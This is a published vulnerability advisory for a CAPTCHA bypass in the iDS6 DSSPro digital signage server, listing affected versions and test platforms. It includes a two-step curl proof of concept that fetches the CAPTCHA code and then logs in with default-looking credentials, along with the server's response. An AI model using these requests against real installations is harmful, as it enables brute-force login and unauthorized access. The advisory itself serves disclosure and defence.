iDS6 DSSPro Digital Signage System 6.2 CAPTCHA Security Bypass

Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page:
Affected version: V6.2 B2014.12.12.1220
                  V5.6 B2017.07.12.1757

Summary: iDS6 Software's DSSPro network digital signage management
system is a web-based server software solution for Windows.

Desc: The CAPTCHA function for DSSPro is prone to a security bypass
vulnerability that occurs in the CAPTCHA authentication routine. By
requesting the autoLoginVerifyCode object an attacker can receive a
JSON message code and successfully bypass the CAPTCHA-based authentication
challenge and perform brute-force attacks.

Tested on: Microsoft Windows XP
           Microsoft Windows 7
           Microsfot Windows Server 2008
           Microsoft Windows Server 2012
           Microsoft Windows 10
           Apache Tomcat/8.0.44
           Apache Tomcat/6.0.35
           Apache Axis/1.4
           MySQL 5.5.25
           Java 1.8.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2020-5607
Advisory URL:



Get CAPTCHA code:

$ curl -i\!autoLoginVerifyCode -c cookies.txt


Use CAPTCHA code:

$ curl -i\!userValidate -b cookies.txt -d "shortName=&user.userName=boss&user.password=boss&loginVerifyCode=6435&autoSave=true&autoLogin=true&domain_login=" -v

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: cookie.username=boss; Expires=Wed, 21-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.password=boss; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autosave=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Set-Cookie: cookie.autologin=true; Expires=Wed, 01-Jul-2021 19:41:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-json;charset=UTF-8
Date: Tue, 21 Jul 2020 19:41:26 GMT
Connection: close
Content-Length: 16